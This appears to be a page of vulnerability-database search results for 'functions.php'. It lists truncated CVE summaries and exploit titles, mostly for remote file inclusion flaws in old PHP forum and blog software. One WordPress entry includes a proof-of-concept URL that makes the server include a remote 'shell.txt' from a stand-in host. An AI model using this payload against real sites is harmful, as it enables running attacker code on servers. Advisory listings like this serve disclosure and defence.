295 matches found
Cross site scripting
Cross-site scripting XSS vulnerability in the wpexplainnonce function in the nonce AYS functionality wp-includes/functions.php for WordPress 2.0 before 2.0.9 and 2.1 before 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the file parameter to wp-admin/templates.php, and...
CVE-2007-0762
PHP remote file inclusion vulnerability in includes/functions.php in phpBB++ Build 100 allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit
No description provided by source. C xoron Name: phpBB++ phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn...
Omegaboard <= 1.0beta4 (functions.php) Remote File Include Vuln
No description provided by source. ----------------------------------------------- Omegaboard v1.0b4 phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz - xoron.info ----------------------------------------------- Code: includeonce...
phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion
C xoron Name: phpBB++ phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=86688&packageid=90098 xoron.biz - xoron.info Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn Tesekkurler: chaos, pang0, DJR POC:...
phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability
No description provided by source. ----------------------------------------------- phpBB2 MODificat phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz ----------------------------------------------- Code: includeonce $phpbbrootpath...
phpbb2-rfi.txt
----------------------------------------------- phpBB2 MODificat phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz ----------------------------------------------- Code: includeonce $phpbbrootpath...
Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion
----------------------------------------------- Omegaboard v1.0b4 phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz - xoron.info ----------------------------------------------- Code: includeonce $phpbbrootpath...
phpBB2 MODificat <= 0.2.0 (functions.php) Remote Include Vulnerability
Exploit for unknown platform in category web applications ====================================================================== phpBB2 MODificat = 0.2.0 functions.php Remote Include Vulnerability ======================================================================...
PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion
----------------------------------------------- phpBB2 MODificat phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz ----------------------------------------------- Code: includeonce $phpbbrootpath...
EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit
Exploit for unknown platform in category web applications ================================================================== EclipseBB 0.5.0 Lite phpbbrootpath Remote File Include Exploit ================================================================== C xoron Bug name: EclipseBB 0.5.0 Lite...
LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================== LunarPoll 1.0 show.php PollDir Remote File Include Vulnerability ================================================================== AYYILDIZ.ORG PreSents... Script:LunarPol...
CVE-2006-6808
Cross-site scripting XSS vulnerability in wp-admin/templates.php in WordPress 2.0.5 allows remote attackers to inject arbitrary web script or HTML via the file parameter. NOTE: some sources have reported this as a vulnerability in the getfiledescription function in wp-admin/admin-functions.php...
PHPMyProfiler Functions.PHP远程文件包含漏洞
PHPMyProfiler是一款基于PHP的WEB应用程序。 PHPMyProfiler不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Functions.PHP'脚本对用户提交的'pmprelpath'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 phpMyProfiler 0.9.6 目前没有详细解决方案提供,请关注以下链接: http://www.phpmyprofiler.de/...
CVE-2006-6068
The CVE-2006-6068 entry concerns a directory traversal in the mAlbum 0.3 and earlier release. The vulnerability occurs in the cached_album function in functions.php, where user input passed via the gal parameter to index.php can be traversed using dot-dot sequences to list filenames of arbitrary ...
wordpress-rfi.txt
WordPress Remote File Inclusion Download:http://wordpress.org/latest.zip Found by ANtrAX http://foro.c-group.org Vulnerable Code: global $posts, $post, $wpdidheader, $wpdidtemplateredirect, $wpquery, $wprewrite, $wpdb; extract$wpquery-queryvars; requireonce$file; ..... Affected File:...
Wordpress File Inclusion
WordPress Remote File Inclusion Download:http://wordpress.org/latest.zip Found by ANtrAX http://foro.c-group.org Vulnerable Code: global $posts, $post, $wpdidheader, $wpdidtemplateredirect, $wpquery, $wprewrite, $wpdb; extract$wpquery-queryvars; requireonce$file; ..... Affected File:...
WordPress Functions.PHP 远程包含文件漏洞
因为它并没有足够的过滤用户提供数据. 一个可以让攻击者利用此问题上妥协的应用和基本制度; 其他攻击也是可能.wordpress2.0.5版是漏洞的. WordPress WordPress 2.0.5 [email protected] http://www.example.com/wp-includes/functions.php?file=http://www.example2.com/shell.txt?...
CVE-2006-5520
PHP remote file inclusion vulnerability in functions.php in DeltaScripts PHP Classifieds 7.1 allows remote attackers to execute arbitrary PHP code via a URL in the setpath parameter...
CVE-2006-5520
PHP remote file inclusion vulnerability in functions.php in DeltaScripts PHP Classifieds 7.1 allows remote attackers to execute arbitrary PHP code via a URL in the setpath parameter...